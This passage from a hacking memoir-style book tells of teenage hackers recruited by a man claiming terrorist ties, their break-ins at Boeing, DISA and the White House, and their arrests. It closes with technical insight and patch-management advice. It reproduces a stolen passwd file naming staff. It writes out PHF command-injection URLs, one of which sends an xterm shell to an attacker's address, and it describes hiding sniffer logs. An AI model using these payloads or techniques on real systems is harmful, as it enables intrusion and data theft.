on a regular basis. He was just there, and it was understood that this was his
thing.” By “his thing,” ne0h meant breaking into military sites or the com-
puter systems of commercial companies working on military projects.
  Khalid asked ne0h to get into Lockheed Martin and obtain the
schematics of certain aircraft systems they were manufacturing for
Boeing. ne0h did succeed in getting some limited penetration into
 28                          The Art of Intrusion


Lockheed, “about three steps into the internal network,” but couldn’t
get any deeper than two servers (to a level that security people call the
“DMZ” — in effect, a no-man’s-land). This was not far enough to pen-
etrate past the firewalls that protect the most sensitive corporate infor-
mation, and he couldn’t locate the information he had been told to look
for. According to ne0h:

      [Khalid] got irritated. What he said was basically, “You’re not
      working for me any more. You can’t do anything.” But then he
      accused me of withholding. He said I was just keeping the infor-
      mation for myself.
      Then he said, “Forget Lockheed Martin. Get directly into Boeing.”

  ne0h found that Boeing “wasn’t that secure, if you wanted it bad
enough.” He got in, he says, by exploiting a known vulnerability of a Boeing
system exposed to the Internet. Then, installing a “sniffer,” he was able to
eavesdrop on all the packets of data going to and from a computer — a kind
of computer wiretap. From this he was able to capture passwords and
unencrypted email. Information he gleaned from the emails revealed
enough intelligence to get into its internal network.

      I found six or seven schematics to doors and the nose of Boeing
      747s — just getting passed through clear-text email.
      Unencrypted attachments. Isn’t that great?! (And he laughs.)
      Khalid was ecstatic. He said he was going to give me $4,000. It
      never showed up — surprise, surprise.

   In fact, $4,000 would have been a gross overpayment for the informa-
tion. According to former Boeing security executive Don Boelling, this
hack could well have been carried out against Boeing as described. But it
would have been a waste of time: Once an aircraft model goes into serv-
ice, all customer airlines are given complete sets of schematics. At that
point the information is no longer considered company-sensitive; any-
body who wants it can have it. “I even saw a CD of the 747 schematics
being offered on eBay recently,” Don said. Of course, Khalid would not
likely have known this. And it wouldn’t be until two years later that the
nation would find out some terrorists had strong reasons for wanting the
schematics of major transport planes used by U.S. airlines.


Target for Tonight: SIPRNET
With Comrade, Khalid didn’t bother setting up test exercises. From the first,
the hacker says, Khalid “was only interested in military and SIPRNET.”
                   Chapter 2   When Terrorists Come Calling                   29

     Most things he wasn’t very specific about what he wanted — just
     access to government and military sites. Except for SIPRNET.
     He really wanted information from SIPRNET.

   No wonder Khalid was eager; this had probably been his target all along.
SIPRNET is the portion of DISN, the Defense Information System
Network, which carries classified messages. More than that, SIPRNET
(it’s an acronym for the Secret Internet Protocol Router Network) is now
the core of the command and control capability for the U.S. military.
   ne0h had already refused an offer from Khalid for a SIPRNET access:

     He offered $2,000. I turned him down. If I got into SIPRNET,
     I’d have the Feds knocking at my door. $2,000 wasn’t worth a
     bullet in the head.

  By the time Khalid spoke to Comrade about the assignment, the price
had gone up. “He said he would pay I think it was ten thousand dollars
for access,” Comrade remembers, sounding a good deal less skittish than
ne0h about taking on the project, though he insists convincingly that it
was the challenge, not the money, that tempted him.

     I actually came pretty close to SIPRNET. I got into this one com-
     puter system at the Defense Information Security Agency, DISA.
     That computer was just slick. It had I think four processors, like,
     2,000 users had access to it, the Unix host file had, like, 5,000 dif-
     ferent hosts, and half of them were using privileged accounts; you
     had to be on that computer to access it — you couldn’t access it
     from the outside.

  However he figured it out, Comrade’s hunch that he had stumbled into
something important was on target. The core missions of DISA include
joint command and control, and combat support computing — a clear
overlap with the functions of SIPRNET. But his efforts were cut short.

     Pretty sweet to have all that access, but I never had enough time
     to play around with it to get anywhere. I got busted, like, three or
     four days later.


A Time for Worrying
On Christmas day 1999, ne0h and Comrade received a jolt. Indian
Airlines flight IC-814, en route from Katmandu to New Delhi with 178
passengers and 11 crew, was hijacked in flight. According to news
 30                           The Art of Intrusion


reports, the hijackers were Pakistani terrorists associated with the Taliban.
Terrorists like Khalid?
   Under orders of the hijackers, the Airbus A300 proceeded on a zigzag
journey to the Middle East and back, landing briefly in India, Pakistan,
and the United Arab Emirates, where the body of a slain passenger was
removed, a young man on the way home with his new wife from their
honeymoon. He had been stabbed to death for the minor offense of
refusing to put on a blindfold.
   The plane eventually landed in Kandahar, Afghanistan — increasing the
likelihood of a Taliban connection. The remaining passengers and crew
were held on board for eight terror-filled days, and were ultimately
released in exchange for the release of three jailed militants. One of those
released, Sheikh Umer, would later play a role in aiding the financing of
Mohammed Atta, a leader of the 9/11 World Trade Center attacks.
   After the hijacking, Khalid told ne0h that his group was responsible
and he himself had been involved.

      That scared me to death. He was a bad guy. I felt I had to cover
      my ass.

  But ne0h’s distress was tempered by boyish greed. “I still hoped he
would pay me my money,” he added.
  The hijacking connection added fuel to a fire that Khalid had set ablaze
earlier. At one point, apparently annoyed by the teenagers’ lack of success
in providing the information he was asking for, Khalid had tried a high-
pressure tactic. Reporter Niall McKay, in the same story for Wired.com,
wrote of seeing an old IRC message from Khalid to the youngsters in
which he threatened to have them killed if they reported him to the FBI.
McKay wrote that he also saw a message from the Pakistani to the kids:
“I want to know: Did [anybody] tell the Feds about me?” And in another
place, “Tell them [if they did that], they are dead meat. I will have snipers
set on them.”2


Comrade Gets Busted
The situation was getting sticky, but it was about to get worse. A few days
after Comrade’s success in penetrating a system associated with SIPR-
NET, his father was pulled over on his way to work. The cops told him,
“We want to talk to your son,” and showed him a search warrant.
Comrade remembers:

      There were some people from NASA, the DoD, the FBI. In all
      there were like ten or twelve agents, and some cops, too. I had been
                  Chapter 2   When Terrorists Come Calling                31

     messing around in some NASA boxes, I put a sniffer up on
     ns3.gtra.mil, just to pick up passwords. But as a side effect, it
     picked up emails as well. They told me I was being charged with
     illegal wiretaps for that. And then for the NASA computers I got
     copyright violations or infringement. And other things.
     Just the day before, a friend said, “Dude, we’re going to get
     busted soon.” He was flipping out. I figured, “Yeah, he’s got a
     point.” So I wiped my hard drive.

  But Comrade wasn’t thorough about the cleanup job. “I had forgot-
ten the old drives hanging around my desk.”

     They questioned me. I admitted it, I said, “I’m sorry, here’s what
     I did, here’s how to fix it, I won’t do it again.” They were like,
     “All right, we don’t consider you a criminal, don’t do it again.
     If you do it again, you’ll leave in handcuffs.” They packed up my
     computers, peripherals, and spare hard drives, and they left.

  Later on they tried to get Comrade to tell them the password to his
encrypted hard drives. When he wouldn’t tell, they said they knew how
to crack the passwords. Comrade knew better: He had used PGP (Pretty
Good Privacy) encryption and his password was “about a hundred char-
acters long.” Yet he insists it’s not hard to remember — it’s three of his
favorite quotes strung together.
  Comrade didn’t hear anything more from them for about six months.
Then one day he got word that the government was going to press charges.
By the time he got to court, he was being nailed for what the prosecutor
claimed was a three-week shutdown of NASA computers and intercepting
thousands of email messages within the Department of Defense.
  (As I know all too well, the “damage” claimed by prosecutors and the
real-life damage are sometimes quite different. Comrade downloaded
software from the NASA’s Marshall Space Flight Center in Alabama, used
in controlling the temperature and humidity of the International Space
Station; the government claimed that this had forced a three-week shut-
down of certain computer systems. The Department of Defense attack
offered more realistic cause for concern: Comrade had broken into the
computer system of the Defense Threat Reduction Agency and installed
a “back door” allowing him access at any time.)
  The government obviously considered the case important as a warning
to other teenage hackers, and made much of his conviction in the press,
proclaiming him the youngest person ever convicted of hacking as a fed-
eral crime. Attorney General Janet Reno even issued a statement that said
in part, “This case, which marks the first time a juvenile hacker will serve
 32                         The Art of Intrusion


time in a detention facility, shows that we take computer intrusion seri-
ously and are working with our law enforcement partners to aggressively
fight this problem.”
  The judge sentenced Comrade to six months in jail followed by six
months probation, to start after the end of the school semester.
Comrade’s mother was still alive at the time; she hired a new lawyer, got
a lot of letters written, presented the judge what Comrade calls “a whole
new case,” and, incredibly, managed to get the sentence reduced to
house arrest followed by four years of probation.
  Sometimes in life we don’t make the best of opportunities. “I did the
house arrest and was going through probation. Various things happened,
I started partying too much, so they sent me to rehab.” Back from rehab,
Comrade got a job with an Internet company and started his own
Internet outfit. But he and his probation officer weren’t seeing eye to eye
and Comrade was sent to prison after all. He was just 16 years old, incar-
cerated for acts he committed at age 15.
  There aren’t all that many juveniles in the federal system; the place he
was sent turned out to a “camp” (apparently an appropriate word) in
Alabama that housed only 10 prisoners and that Comrade describes as
looking “more like a school — locked doors and razor wire fences but
otherwise not much like a jail.” He didn’t even have to go to class
because he had already finished high school.
  Back in Miami and again on probation, Comrade was given a list of
hackers he would not be allowed to talk to. “The list was like this guy,
this guy, and ne0h.” Just “ne0h” — the federal government knew him
only by his handle. “They had no idea who he was. If I had access to two
hundred things, he had access to a thousand things,” Comrade says.
“ne0h was pretty slick.” As far as either of them knows, law enforcement
still hasn’t managed to pin a name on him or pinpoint his location.


Investigating Khalid
Was Khalid the militant he claimed to be, or just some faker pulling the
chains of the teenagers? Or maybe an FBI operation to probe how far the
young hackers were willing to go? At one time or another, each of the
hackers who had dealings with Khalid were suspicious that he wasn’t
really a militant; the idea of providing information to a foreign agent
seems to have bothered them a good deal less than the idea the guy
might be duping them. Comrade said that he “wondered for the longest
time what [Khalid] was. I didn’t know if he was a Fed or if he was for
real. Talking to ne0h and talking to him, I decided he was pretty legit.
But I never took money from him — that was a barrier I didn’t want to
cross.” (Earlier in the conversation, when he had first mentioned the
                   Chapter 2   When Terrorists Come Calling             33

offer of $10,000 from Khalid, he had sounded impressed by the sum.
Would he really have declined the money if his efforts had been successful
and Khalid had actually paid up? Perhaps even Comrade himself doesn’t
really know the answer to that one.)
  ne0h says that Khalid “sounded absolutely professional” but admits to
having had doubts along the way about whether he was really a militant.
“The whole time I was talking to him, I thought he was full of shit. But
after researching with friends who he’s contacted and given other infor-
mation to, we actually think he really was who he said he was.
  Another hacker, Savec0re, encountered someone on IRC who said that
he had an uncle in the FBI who could arrange immunity for an entire
hacker group called Milw0rm. “I thought that this would send a message
to the FBI that we weren’t hostile,” Savec0re told journalist McKay in an
email interview. “So I gave him my phone number. The next day I got a
call from the so-called FBI agent, but he had an amazingly strong
Pakistani accent.”
  “He said his name was Michael Gordon and that he was with the FBI in
Washington, DC,” Savec0re told the journalist. “I realized then that it had
been Ibrahim all along.” While some people were wondering if the sup-
posed terrorist might be an FBI sting, Savec0re was reaching the opposite
conclusion: that the guy claiming to be an FBI agent was really the same
terrorist, trying to see if the boys were willing to blow the whistle on him.
  The notion that this might have been an FBI operation doesn’t seem
to stand up. If the federal government wanted to find out what these kids
were capable of and willing to do, money would have been flowing.
When the FBI thinks a situation is serious enough to run a sting, they put
money behind the effort. Promising $1,000 to ne0h and then not pay-
ing it wouldn’t make any sense.
  Apparently only one hacker actually saw any money from Khalid:
Chameleon. “I went to my post-office box one morning, and there was
a check for a thousand dollars with a number to call in Boston,”
Chameleon was quoted as saying in another Wired News story
(November 4, 1998). Khalid understood he had maps of government
computer networks; the check was payment for the maps. Chameleon
cashed the check. Two weeks later he was raided by the FBI and interro-
gated about the payment, raising the interesting question of how the
government knew about the thousand dollars. This was before 9/11,
when the FBI was focused on domestic crime and paying scant attention
to the terrorist threat. Chameleon admitted taking the money but
insisted to the Wired News journalist that he had not provided any gov-
ernment network maps.
 34                          The Art of Intrusion


  Though he had confessed to accepting money from a foreign terrorist,
which could have brought a charge of espionage and the possibility of a
very long sentence, no charges were ever filed — deepening the mystery.
Perhaps the government just wanted word to spread in the hacker com-
munity that doing business with foreign agents could be risky. Perhaps
the check wasn’t from Khalid after all, but from the FBI.
  Few people know Chameleon’s true identity, and he very much wants
to keep it that way. We wanted to get his version of the story. He refused
to talk about the matter (merely giving himself an out by mentioning he
thought Khalid was a Fed just posing as a terrorist). If I were in his posi-
tion, I probably wouldn’t want to be interviewed on the subject either.


The Harkat ul-Mujahideen
While searching the Internet Relay Chat logs, reporter McKay found that
Khalid had at one point described himself to the young hackers as a mem-
ber of Harkat-ul-Ansar.3 According to the South Asia Intelligence Review,
“the Harkat-ul-Ansar was termed a terrorist organization by the US due
to its association with the exiled Saudi terrorist Osama bin Laden in
1997. To avoid the repercussions of the US ban, the group was recast as
the Harkat ul-Mujahideen in 1998.”4
  The U.S. Department of State has repeatedly warned about this group.
One item from State reads, “Pakistani officials said that a U.S. air raid on
October 23 [2001] had killed 22 Pakistani guerrillas who were fighting
alongside the Taliban near Kabul. The dead were members of the Harkat
ul-Mujaheddin ... [which] had been placed on the State Department’s
official list of terrorist organizations in 1995.”5
  In fact, the Harkat is today one of the 36 groups designated by State
as foreign terrorist organizations. Our government, in other words, con-
siders them among the baddest actors on the face of the globe.
  The young hackers, of course, didn’t know this. To them, it was all a
game.
  As for Khalid, a major general of the Indian armed forces, giving an
address on the topic of information security in April 2002, confirmed
Khalid as a terrorist, telling his audience about hacker links with “Khalid
Ibrahim of Pakistani-based Harkat-ul-Ansar.”6 The general seemed trou-
bled, however, that Khalid himself was based not in Pakistan but in the
general’s own country, at Delhi, India.


In the Aftermath of 9/11
Some hackers manipulate and deceive. They fool computer systems into
thinking they have authorization that they have in fact stolen; they practice
                  Chapter 2   When Terrorists Come Calling                 35

social engineering to manipulate people in order to achieve their goals. All
of this means that when you talk to a hacker, you listen carefully to see if
what he’s telling you, and the way he’s saying it, suggest that he can be
believed. Sometimes you’re just not certain.
  My coauthor and I weren’t certain about what ne0h told us of his reac-
tion to 9/11. We believe it just enough to share it:

     Do you know how much I cried that day? I felt for sure my life
     was over.

 This was accompanied by a curious nervous laugh — signifying what?
We couldn’t tell.

     To think that maybe I had something to do with it. If I had gone
     into Lockheed Martin or Boeing and got more information, they
     could have used that. It was a bad time for me and for America.
     I cried because I never thought to report him. I didn’t use my best
     judgment. That’s the reason he hired me to do all these things ...
     If I had even a pinkie-finger of a hand into the Trade Center ...
     [The thought] was absolutely devastating.
     Actually I lost three friends in the World Trade Center; I never
     felt so bad.

  Many hackers are in their teens or even younger. Is that too young to
recognize the potential danger of responding to requests from someone
who could pose a threat to our country? Personally, I’d like to think
9/11 has made American hackers — even very young ones — suspicious,
unlikely to be suckered by a terrorist. I just hope I’m right.


The White House Break-in
The history of computer security in one way parallels the ancient history
of cryptography. For centuries, code makers have devised ciphers that they
labeled “unbreakable.” Even today, in an age of computers that can read-
ily encrypt a message using a one-time pad, or a key containing hundreds
of characters, most codes are still breakable. (America’s code-making and
code-breaking organization, the National Security Agency, boasts a num-
ber of the world’s largest, fastest, most powerful computers.)
   Computer security is like a constant cat-and-mouse game, with security
experts on one side and intruders on the other. The Windows operating
system contains lines of code numbering in the tens of millions. It’s a
 36                           The Art of Intrusion


no-brainer that any software of massive size will inevitably contain vul-
nerabilities that dedicated hackers will eventually discover.
  Meanwhile, company workers, bureaucrats, sometimes even security
professionals will install a new computer or application and overlook the
step of changing the default password, or constructing one that’s rea-
sonably secure — leaving the device in a vulnerable state. If you read the
news of hacker attacks and break-ins, you already know that military and
government sites, and even the White House Web site, have already been
compromised. In some cases repeatedly.
  Getting onto a site and defacing a Web page is one thing — most of the
time it’s essentially trivial, if annoying. Still, many people rely on a single
password for every use; if breaking into a Web site leads to capturing pass-
words, the attackers might be in position to gain access to other systems on
the network and do a great deal more damage. ne0h says that in 1999 he
and two other members of the hacker’s group gLobaLheLL did just that,
on one of the most sensitive spots in the United States: the White House.

      I believe that the White House was doing a reinstall of their oper-
      ating system. They had everything defaulted. And for that period
      of ten, fifteen minutes, Zyklon and MostFearD managed to get
      in, get the shadowed password file, crack it, enter, and change the
      Web site. I was right there while they were doing it.
      It was basically being at the right place at the right time. It was
      just by chance, just a fluke that they happened to be on line just
      when the site was being worked on.
      We had discussed it in the gLobaLheLL chat room. I was woken
      up by a phone call around 3 A.M. saying they were doing it. I
      said, “Bullshit. Prove it.” I jumped on my computer. Sure enough,
      they did it.
      MostFearD and Zyklon did most of it. They gave me the shadow
      file to crack as fast as I could. I got one [password] — a simple
      dictionary word. That was about it.

  ne0h provided a portion of what he says is the password file that the
others obtained and passed to him, listing what appears to be a few of the
authorized users on the White House staff 7:

  root:x:0:1:Super-User:/:/sbin/sh
  daemon:x:1:1::/:
  bin:x:2:2::/usr/bin:
  sys:x:3:3::/:
  adm:x:4:4:Admin:/var/adm:
  uucp:x:5:5:uucp Admin:/usr/lib/uucp:
                  Chapter 2   When Terrorists Come Calling             37

  nuucp:x:9:9:uucp
  Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
  listen:x:37:4:Network Admin:/usr/net/nls:
  nobody:x:60001:60001:Nobody:/:
  noaccess:x:60002:60002:No Access User:/:
  nobody4:x:65534:65534:SunOS 4.x Nobody:/:
  bing:x:1001:10:Bing Feraren:/usr/users/bing:/bin/sh
  orion:x:1002:10:Christopher
  Adams:/usr/users/orion:/usr/ace/sdshell
  webadm:x:1130:101:Web
  Administrator:/usr/users/webadm:/bin/sh
  cadams:x:1003:10:Christopher
  Adams:/usr/users/cadams:/usr/ace/sdshell
  bartho_m:x:1004:101:Mark
  Bartholomew:/usr/users/bartho_m:/usr/ace/sdshell
  monty:x:1139:101:Monty Haymes:/usr/users/monty:/bin/sh
  debra:x:1148:101:Debra Reid:/usr/users/debra:/bin/sh
  connie:x:1149:101:Connie
  Colabatistto:/usr/users/connie:/bin/sh
  bill:x:1005:101:William Hadley:/usr/users/bill:/bin/sh

   This is in the form of a Unix or Linux password file, the kind used when
the encrypted passwords are stored in a separate, protected file. Each line
lists the name of one person who has an account on the system. The entry
“sdshell” on some lines suggests that these users, for additional security,
were carrying a small electronic device called an RSA SecureID, which dis-
plays a six-digit number that changes every 60 seconds. To sign on, these
users must enter the six-digit number displayed at that moment on their
SecureID device along with a PIN number (which may be assigned in
some companies or self-chosen in others).The White House Web site was
defaced at the same time as the break-in, to show they had been there,
according to ne0h, who provided a link to the defacement (see Figure
2-1).8 Besides bearing a symbol for the gLobaLheLL hacker group, the
message also includes a logo for the Hong Kong Danger Duo. That was,
ne0h says, a phony name made up to add an element of deception.
   As ne0h remembers it, the guys responsible for this White House hack
didn’t feel any particular elation about having been able to break into
what should be among the half dozen or dozen most secure Web sites in
the nation. They were “pretty busy trying to break into everything,”
ne0h explained, “to prove to the world that we were the best.” Instead
of virtual pats on the back all around, it was, he says, more an attitude of
“Good job, guys, we finally got it, what’s next?”
   But they didn’t have much time left for other break-ins of any sort.
Their worlds were about to crumble, and that part of the tale brings the
story back around once again to the mysterious Khalid.
 38                           The Art of Intrusion




Figure 2-1: Defacement page on White
House Web site, May 1999.


  Zyklon, otherwise known as Eric Burns, takes over the narrative at this
point. He wasn’t ever actually a member of globaLheLL, he says, but did
hang around on IRC with some of the guys. In his description of events,
the White House hack became possible when he discovered the Web site
was susceptible to being compromised by exploiting a hole in a sample
program called PHF, which is used to access a Web-based phone book
database. This was a critical vulnerability, but although people in the hacker
community knew about it, “not many people were using it,” Zyklon says.
  Carrying out a number of steps (detailed in the Insight section at the
end of this chapter), he was able to gain root on whitehouse.gov and
establish access to other systems on the local network, including the White
House mail server. Zyklon at that point had the ability to intercept any
messages between White House staffers and the public, though of course
those messages would not have revealed any classified information.
  But he was also, Zyklon says, able to “grab a copy of the password and
shadow files.” They hung around the site, seeing what they could find,
waiting until people started arriving for work. While he was waiting, he
received a message from Khalid, who said he was writing an article about
recent break-ins, and asking Zyklon if he had any recent exploits to tell
                  Chapter 2   When Terrorists Come Calling             39

about. “So I told him we were right then into the White House Web
site,” Zyklon said.
   Within a couple of hours of that exchange, Zyklon told me, they saw a
sniffer appear on the site — a system administrator was looking to see
what was going on and trying to track who the people were on the site.
Just coincidence? Or did he have some reason to be suspicious at that
particular moment? It would be months before Zyklon found out the
answer. For the moment, as soon as they spotted the sniffer, the boys
pulled the plug, got off the site, and hoped they had caught on to the
administrator before he had caught on to them.
   But they had stirred up the proverbial hornet’s nest. About two weeks
later the FBI descended in force, rounding up every gLobaLheLL mem-
ber they had been able to identify. In addition to Zyklon — then 19,
arrested in Washington state — they also grabbed MostHateD (Patrick
Gregory, also 19, from Texas), and MindPhasr (Chad Davis, Wisconsin),
along with others.
   ne0h was among the few who survived the sweep. From the safety of
his remote location, he was incensed, and posted a Web site defacement
page with a message of defiance; as edited for prime time, it read: “Listen
up FBI m____ f_____ers. Don’t f___ with our members, you will loose.
we are holding fbi.gov as I type this. AND YOUR FEARING. We got
arrested because you dumb idouts cant figure out who hacked the white-
houe.. right? so you take us alll in and see if one of them narcs. GOOD
F___ING LUCK.. WE WONT NARC. Don’t you understand? I SAID
WORLD DOMINATION.”
   And he signed it: “the unmerciful, ne0h.”9


Aftermath
So how did that system administrator happen to be sniffing so early in the
morning? Zyklon doesn’t have any doubt about the answer. When the
prosecutors had drawn up the papers in his case, he found a statement that
information leading to knowledge of the gLobaLheLL break-in to the
White House site had been provided by an FBI informant. As he remem-
bers it, the paper also said that the informant was in New Delhi, India.
  In Zyklon’s view, there isn’t any doubt. The only person he had told
about the White House break-in — the only person — was Khalid
Ibrahim. One plus one equals two: Khalid was an FBI informant.
  But the mystery remains. Even if Zyklon is correct, is that the whole
story? Khalid was an informant, helping the FBI locate kid hackers will-
ing to conduct break-ins to sensitive sites? Or is there another possible
explanation: that his role as an informant was only half the story, and he
was in fact also the Pakistani terrorist that the Indian general believed he
 40                          The Art of Intrusion


was. A man playing a double role, helping the cause of the Taliban while
he infiltrated the FBI.
  Certainly his fears about one of the kids reporting him to the FBI fit
this version of the story.
  Only a few people know the truth. The question is, are the FBI agents
and federal prosecutors who were involved among those who know the
real story. Or were they, too, being duped?
  In the end, Patrick Gregory and Chad Davis were sentenced to 26
months, and Zyklon Burns got 15 months. All three have finished serv-
ing their time and are out of prison.


Five Years Later
These days hacking is mostly just a memory for Comrade, but his voice
becomes more alive when he talks about “the thrill of doing shit you’re not
supposed to be doing, going places you’re not supposed to go, hoping to
come across something cool.”
  But it’s time to get a life. He says he’s thinking about college. When
we spoke, he was just back from scouting schools in Israel. The language
wouldn’t be too much of a problem — he learned Hebrew in elementary
school and in fact was surprised at how much he remembered.
  His impressions of the country were mixed. The girls were “really
great” and the Israelis proved very fond of America. “They seem to look
up to Americans.” For example, he was with some Israelis who were
drinking a soft drink he had never heard of called RC Cola; it turned out
to be an American product. The Israelis explained, “On the commercials,
that’s what Americans drink.” He also encountered “some anti-American
vibes with people that don’t agree with the politics,” but took it in stride:
“I guess you get that anywhere.”
  He hated the weather — “cold and rainy” while he was there. And then
there was the computer issue. He had bought a laptop and wireless espe-
cially for the trip, but discovered that “the buildings are build out of this
huge thick stone.” His computer could see 5 or 10 networks, but the sig-
nals were too weak to connect and had to walk 20 minutes to a place
where he could log on.
  So Comrade is back in Miami. A teenager with a felony on his rap
sheet, he’s now living on his inheritance, trying to decide about going to
college. He’s 20 years old, and not doing much of anything.
  Comrade’s old buddy ne0h works for a major telecom company (a nine-
to-five job is “no good,” he says), but he’ll shortly be in Los Angeles for
three months on a manual labor job he took because the pay is so much
more than he’s making right now. Joining mainstream society, he hopes
                   Chapter 2   When Terrorists Come Calling                  41

to put away enough for a down payment on a house in the community
where he currently lives.
  When the three-month high-paying drudgery is over, ne0h, too, talks
about starting college — but not to study computer science. “Most of
the people I’ve ever run into that have computer science degrees know
shit-all,” he says. Instead, he’d like to major in business and organiza-
tional management, then get into the computer field on a business level.
  Talking about his old exploits brings up his Kevin fixation again. To
what extent did he imagine himself walking in my shoes?

     Did I want to get caught? I did and I didn’t. Being caught shows
     “I can do it, I did it.” It’s not like I wanted to get caught on pur-
     pose. I wanted to get caught so I would fight it, I would be
     released, I would be the hacker that got away. I would get out, get
     a good sound job with a government agency and I would fit right
     in with the underground.


How Great Is the Threat?
The combination of determined terrorists and fearless kid hackers could
be disastrous for this country. This episode left me wondering how many
other Khalids are out there recruiting kids (or even unpatriotic adults
with hacking skills) and who hunger after money, personal recognition,
or the satisfaction of successfully achieving difficult tasks. The post-
Khalid recruiters may be more secretive and not as easy to identify.
  When I was in pretrial detention facing hacking-related charges, I was
approached several times by a Columbian drug lord. He was facing life in
federal prison without the possibility of parole. He offered me a sweet
deal: I would be paid $5 million dollars in cash for hacking into
“Sentry” — the Federal Bureau of Prisons computer system — and
releasing him from custody. This guy was the real thing and deadly seri-
ous. I didn’t accept his offer, but I gave the impression I would help him
out to avoid any confrontation. I wonder what ne0h would have done in
a similar situation.
  Our enemies may well be training their soldiers in the art of cyber war-
fare to attack our infrastructure and defend their own. It seems like a no-
brainer that these groups would also recruit knowledgeable hackers from
anywhere in the world for training and for mission-critical projects.
  In 1997 and again in 2003, the Department of Defense launched
Operation Eligible Receiver — an effort to test the vulnerability of this
nation to electronic attack. According to an account published in the
Washington Times10 about the earlier of these efforts, “Senior Pentagon
leaders were stunned by a military exercise showing how easy it is for
 42                        The Art of Intrusion


hackers to cripple U.S. military and civilian computer networks.” The
article goes on to explain that the National Security Agency assembled a
group of its computer specialists as a “red team” of hackers, allowed to
use only off-the-shelf computer equipment available to the public, along
with any hacking tools, including exploit code, they could download
from the Internet or electronic bulletin boards.
  In a few days the red team hackers infiltrated the computer systems
controlling parts of the nation’s electric power grid and with a series of
commands could have turned sections of the country dark. “If the exer-
cise had been real,” the Christian Science Monitor reported, “they could
have disrupted the Department of Defense’s communication systems
(taking out most of the Pacific Command) and gained access to com-
puter systems aboard U.S. Navy vessels.”11
  In my own personal experience, I was able to defeat security mechanisms
used by a number of Baby Bells to control access to telephone switches. A
decade ago, I had complete control over most switches managed by
Pacific Bell, Sprint, GTE, and others. Imagine the chaos that a resource-
ful terrorist group could have wreaked with the same level of access.
  Members of Al Qaeda and other terrorist groups have a record of using
computer networks in planning terrorist acts. Evidence suggests that ter-
rorists made some use of the Internet in planning their operations for the
9/11 attacks.
  If Khalid Ibrahim was successful in getting information through any of
the young hackers, no one is acknowledging it. If he was really connected
with the attacks on the World Trade Center and the Pentagon, definitive
proof is missing. Yet no one knows when he or one of his kind will reap-
pear on the cyberspace scene, trolling for naive helpers who get a thrill
out of “doing shit you’re not supposed to be doing, going places you’re
not supposed to go.” Kids who might think that the challenge they’re
being offered is “cool.”
  For young hackers, weak security remains a continuing invitation. Yet
the hackers in this story should have recognized the danger in a foreign
national recruiting them to compromise sensitive U.S. computer net-
works. I have to wonder how many other ne0hs have been recruited by
our enemies.
  Good security was never more important than in a world populated by
terrorists.


INSIGHT
ne0h provided us with details on how he hacked into the Lockheed
Martin computer systems. The story is a testimony both to the innovation
                  Chapter 2   When Terrorists Come Calling             43

of hackers (“If there’s a flaw in the security, we’ll find it” might be the
hacker motto) and a cautionary tale for every organization.
   He quickly determined that Lockheed Martin was running its own
Domain Name Servers. DNS, of course, is the Internet protocol that, for
example, translates (“resolves”) www.disney.com into 198.187.189.55, an
address that can be used to route message packets. ne0h knew that a secu-
rity research group in Poland had published what hackers call an exploit —
a program specifically design to attack one particular vulnerability — to
take advantage of a weakness in the version of the DNS that Lockheed was
running.
   The company was using an implementation of the DNS protocols
called BIND (Berkeley Internet Name Domain). The Polish group had
found that one version of BIND was susceptible to a type of attack
involving a remote buffer overflow, and that version was the one being
used at Lockheed Martin. Following the method he had discovered
online, ne0h was able to gain root (administrative) privileges on both the
primary and secondary Lockheed DNS servers.
   After gaining root, ne0h set out to intercept passwords and e-mail by
installing a sniffer program, which acts like a computer wiretap. Any traf-
fic being sent over the wire is covertly captured; the hacker usually sends
the data to be stored in a place where it will be unlikely to be noticed. To
hide the sniffer log, ne0h says, he created a directory with a name that
was simply a space, represented by three dots; the actual path he used was
“/var/adm/ ...” Upon a brief inspection, a system administrator might
overlook this innocuous item.
   This technique of hiding the sniffer program, while effective in many
situations, is quite simple; much more sophisticated methods exist for
covering a hacker’s tracks in a situation like this.
   Before ever finding out if he would be able to penetrate further into the
Lockheed Martin network to obtain company confidential information,
ne0h was diverted to another task. Lockheed Martin’s sensitive files
remained safe.
   For the White House hack, Zyklon says he initially ran a program called
a CGI (common gateway interface) scanner, which scans the target sys-
tem for CGI vulnerabilities. He discovered the Web site was susceptible
to attack using the PHF exploit, which takes advantage of a programmer
error made by the developer of the PHF (phone book) script.
   PHF is a form-based interface that accepts a name as input and looks up
the name and address information on the server. The script called a func-
tion escape_shell_cmd(), which was supposed to sanitize the input for any
special characters. But the programmer had left one character off his list,
the newline character. A knowledgeable attacker could take advantage of
 44                          The Art of Intrusion


this oversight by providing input into the form that included the encoded
version (0x0a) of the newline character. Sending a string with this char-
acter tricks the script into executing any command that the attacker
chooses.
  Zyklon typed into his browser the URL:

  http://www.whitehouse.gov/cgi-bin/phf?Qalias=x%0a/bin/
  cat%20/etc/passwd

   With this, he was able to display the password file for whitehouse.gov.
But he wanted to gain full control over the White House Web server. He
knew it was highly likely that the X server ports would be blocked by the
firewall, which would prevent him from connecting to any of those serv-
ices on whitehouse.gov. So instead, he again exploited the PHF hole by
entering

  http://www.whitehouse.gov/cgi-bin/phf?Qalias=x%0a/usr/
  X11R6/bin/xterm%20-ut%20-display%20zyklons.ip.address:0.0

  This caused an xterm to be sent from the White House server to a com-
puter under his control running an X server. That is, instead of connect-
ing to whitehouse.gov, in effect he was commanding the White House
system to connect to him. (This is only possible when the firewall allows
outgoing connections, which was apparently the case here.)
  He then exploited a buffer overflow vulnerability in the system pro-
gram — ufsrestore. And that, Zyklon says, enabled him to gain root on
whitehouse.gov, as well as access to the White House mail server and
other systems on the network.


COUNTERMEASURES
The exploits of ne0h and Comrade described here raise two issues for all
companies.
   The first is simple and familiar: Keep current on all the latest operating
system and application releases from your vendors. It’s essential to exer-
cise vigilance in keeping up with and installing any security-related
patches or fixes. To make sure this isn’t done on a hit-or-miss basis, all
companies should develop and implement a patch management program,
with the goal of alerting the appropriate personnel whenever a new patch
is issued on products the company uses — operating system software in
particular, but also application software and firmware.
   And when a new patch becomes available, it must be installed as soon
as possible — immediately, unless this would disrupt corporate opera-
tions; otherwise, at the earliest practical time. It’s not hard to understand
                   Chapter 2   When Terrorists Come Calling               45

overworked employees who yield to the pressure of focusing on those
highly visible projects (installing systems for new workers, to give just one
example) and getting around to installing patches on a time-available
basis. But if the unpatched device is publicly accessible from the Internet,
that creates a very risky situation.
   Numerous systems are compromised because of the lack of patch man-
agement. Once a vulnerability is publicly disclosed, the window of expo-
sure is significantly increased until the vendor has released a patch that
fixes the problem, and customers have installed it.
